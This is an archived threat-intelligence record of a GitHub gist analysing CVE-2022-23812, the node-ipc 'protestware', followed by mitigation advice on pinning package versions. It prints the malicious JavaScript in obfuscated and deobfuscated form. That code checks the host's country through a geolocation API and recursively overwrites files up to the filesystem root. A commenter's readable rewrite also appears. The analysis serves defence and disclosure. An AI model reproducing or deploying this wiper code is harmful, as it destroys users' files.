{
	"id": "d43f68c1-fcde-4481-92f9-920a2509a249",
	"created_at": "2026-04-06T00:16:29.193368Z",
	"updated_at": "2026-04-10T13:11:24.508249Z",
	"deleted_at": null,
	"sha1_hash": "e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54",
	"title": "CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 221023,
	"plain_text": "CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware\r\nBy MidSpike\r\nArchived: 2026-04-05 18:50:24 UTC\r\nRIAEvangelist/node-ipc is malware / protestware\r\nThe RIAEvangelist/node-ipc module contains protestware peacenotwar.\r\nExcerpt from RIAEvangelist/node-ipc:\r\nas of v11.0.0 \u0026 v9.2.2 this module uses the peacenotwar module.\r\nMore importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -\u003e\r\n6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/node-ipc contains malware.\r\n⚠️| The following code is malicious, DO NOT RUN IT\r\nhttps://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js\r\nThe following codeblock was added in-case the url above is deactivated\r\nimport u from\"path\";import a from\"fs\";import o from\"https\";setTimeout(function(){const t=Ma\r\n⚠️| The above code is malicious, DO NOT RUN IT\r\nI deobfuscated the code above and found that if the host machine's public ip address was from Russia or Belarus,\r\nnode-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories:\r\n⚠️| The following code is malicious, DO NOT RUN IT\r\nimport u from \"path\";\r\nimport a from \"fs\";\r\nimport o from \"https\";\r\nsetTimeout(function () {\r\n const t = Math.round(Math.random() * 4);\r\nhttps://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c\r\nPage 1 of 9\n\nif (t \u003e 1) {\r\n return;\r\n }\r\n const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNG\r\n o.get(n.toString(\"utf8\"), function (t) {\r\n t.on(\"data\", function (t) {\r\n const n = Buffer.from(\"Li8=\", \"base64\");\r\n const o = Buffer.from(\"Li4v\", \"base64\");\r\n const r = Buffer.from(\"Li4vLi4v\", \"base64\");\r\n const f = Buffer.from(\"Lw==\", \"base64\");\r\n const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\");\r\n const e = Buffer.from(\"cnVzc2lh\", \"base64\");\r\n const i = 
Buffer.from(\"YmVsYXJ1cw==\", \"base64\");\r\n try {\r\n const s = JSON.parse(t.toString(\"utf8\"));\r\n const u = s[c.toString(\"utf8\")].toLowerCase();\r\n const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\"));\r\n if (a) {\r\n h(n.toString(\"utf8\"));\r\n h(o.toString(\"utf8\"));\r\n h(r.toString(\"utf8\"));\r\n h(f.toString(\"utf8\"));\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n}, Math.ceil(Math.random() * 1e3));\r\nasync function h(n = \"\", o = \"\") {\r\n if (!a.existsSync(n)) {\r\n return;\r\n }\r\n let r = [];\r\n try {\r\n r = a.readdirSync(n);\r\n } catch (t) {}\r\n const f = [];\r\n const c = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var e = 0; e \u003c r.length; e++) {\r\n const i = u.join(n, r[e]);\r\n let t = null;\r\n try {\r\n t = a.lstatSync(i);\r\n } catch (t) {\r\n continue;\r\n }\r\n if (t.isDirectory()) {\r\n const s = h(i, o);\r\n s.length \u003e 0 ? f.push(...s) : null;\r\n } else if (i.indexOf(o) \u003e= 0) {\r\n try {\r\n a.writeFile(i, c.toString(\"utf8\"), function () {});\r\n } catch (t) {}\r\n }\r\n }\r\n return f;\r\n}\r\nconst ssl = true;\r\nexport { ssl as default, ssl };\r\n⚠️| The above code is malicious, DO NOT RUN IT\r\nThe following are excerpts from the malicious code:\r\nBuffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4\r\n// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\r\nconst a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\"));\r\n// checks if ip country is Russia or Belarus\r\na.writeFile(i, c.toString(\"utf8\"), function () {});\r\n// overwrites file with `❤️`\r\nThe following demonstrates an example of what each of the parameters going to the\r\na.writeFile(i,c.toString(\"utf8\") would be:\r\n
Edit 2022-03-16_0\r\nComment by zkyf\r\nJust made it better looking and commented dangerous code so you guys can take a try. Obviously the\r\ncode will delete literally EVERYTHING on your drive.\r\nconst path = require(\"path\");\r\nconst fs = require(\"fs\");\r\nconst https = require(\"https\");\r\nsetTimeout(function () {\r\n const randomNumber = Math.round(Math.random() * 4);\r\n if (randomNumber \u003e 1) {\r\n // return;\r\n }\r\n const apiKey = \"https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\";\r\n const pwd = \"./\";\r\n const parentDir = \"../\";\r\n const grandParentDir = \"../../\";\r\n const root = \"/\";\r\n const countryName = \"country_name\";\r\n const russia = \"russia\";\r\n const belarus = \"belarus\";\r\n https.get(apiKey, function (message) {\r\n message.on(\"data\", function (msgBuffer) {\r\n try {\r\n const message = JSON.parse(msgBuffer.toString(\"utf8\"));\r\n const userCountryName = message[countryName.toString(\"utf8\")].toLowerCase();\r\n const hasRus = userCountryName.includes(russia.toString(\"utf8\")) || userCountryName.i\r\n if (hasRus) {\r\n deleteFile(pwd);\r\n deleteFile(parentDir);\r\n deleteFile(grandParentDir);\r\n deleteFile(root);\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n // zkyf: Let's try this directly here\r\n deleteFile(pwd);\r\n deleteFile(parentDir);\r\n deleteFile(grandParentDir);\r\n deleteFile(root);\r\n}, 100);\r\nasync function deleteFile(pathName = \"\", o = \"\") {\r\n if (!fs.existsSync(pathName)) {\r\n return;\r\n }\r\n let fileList = [];\r\n try {\r\n fileList = fs.readdirSync(pathName);\r\n } catch (t) {}\r\n const f = [];\r\n const heartUtf8 = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var idx = 0; idx \u003c fileList.length; idx++) {\r\n const fileName = path.join(pathName, fileList[idx]);\r\n let 
fileInfo = null;\r\n try {\r\n fileInfo = fs.lstatSync(fileName);\r\n } catch (err) {\r\n continue;\r\n }\r\n if (fileInfo.isDirectory()) {\r\n const fileSymbol = deleteFile(fileName, o);\r\n fileSymbol.length \u003e 0 ? f.push(...fileSymbol) : null;\r\n } else if (fileName.indexOf(o) \u003e= 0) {\r\n try {\r\n // fs.writeFile(fileName, heartUtf8.toString(\"utf8\"), function () {}); // overwrites\r\n console.log(`Rewrite ${fileName}`);\r\n } catch (err) {}\r\n }\r\n }\r\n return f;\r\n}\r\nConsole:\r\nEdit 2022-03-16_1 (requested by @lgg)\r\nAvailable mitigation methods:\r\nThe following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods: cnpm/bug-versions#181\r\nIf you use one of the following mitigation strategies, make sure to remove the ^ to force node-ipc to the\r\nspecified version.\r\n\"^9.x.x\" -\u003e \"9.2.1\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^9.x.x\"\r\n+ \"node-ipc\": \"9.2.1\"\r\n }\r\n\"^10.x.x\" -\u003e \"10.1.0\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^10.x.x\"\r\n+ \"node-ipc\": \"10.1.0\"\r\n }\r\n\"^11.x.x\" -\u003e \"10.1.0\"\r\n \"dependencies\": {\r\n- \"node-ipc\": \"^11.x.x\"\r\n+ \"node-ipc\": \"10.1.0\"\r\n }\r\n3rd-party mitigation methods:\r\nvue-cli\r\nUnity Hub\r\nEdit 2022-03-16_2 (requested by @lgg)\r\nCVE-2022-23812\r\nEdit 2022-03-17_0\r\n@RIAEvangelist has banned me from interacting with their repositories\r\nEdit 2022-03-17_1\r\nThe security research firm snyk.io recommends the following mitigation strategy for users of node-ipc:\r\npackage.json\r\n \"overrides\": {\r\n \"node-ipc@\u003e9.2.1 \u003c10\": \"9.2.1\",\r\n \"node-ipc@\u003e10.1.0\": \"10.1.0\"\r\n }\r\nEdit 2022-03-17_2 (credit: @Uzlopak)\r\nNPM users below NPM v8, this is for you!\r\nDon't forget to mention that npm supports override with npm 8. 
Earlier versions don't have overrides\r\ncapabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with\r\nthem. So upgrading npm to 8 would be necessary.\r\nYarn users, this is for you!\r\nYarn 1 - Selective dependency resolutions\r\nYarn 2 - Resolutions\r\nI'm not too familiar with how yarn works, so I don't want to risk giving false instructions to users.\r\nEdit 2022-03-17_3\r\nPlease read this message\r\nI've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories). We\r\nshould remember the high standards that we expect from our fellow developers on GitHub, regardless of what\r\nanother has done.\r\nPreferably this gist and its comments should be focused on the research and discussion of CVE-2022-23812. I'm\r\nsure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.\r\nPlease do not threaten anyone here (or elsewhere for that matter).\r\nEdit 2022-03-18_0\r\nI've begun work on my own fork of node-ipc : MidSpike/node-ipc#1\r\nSource: https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c"
	],
	"report_names": [
		"f7ae3457420af78a54b38a31cc0c809c"
	],
	"threat_actors": [],
	"ts_created_at": 1775434589,
	"ts_updated_at": 1775826684,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.pdf",
		"text": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.txt",
		"img": "https://archive.orkl.eu/e7d8e0b8dc40c31c7eeb9ab9c3536b55f5ac6e54.jpg"
	}
}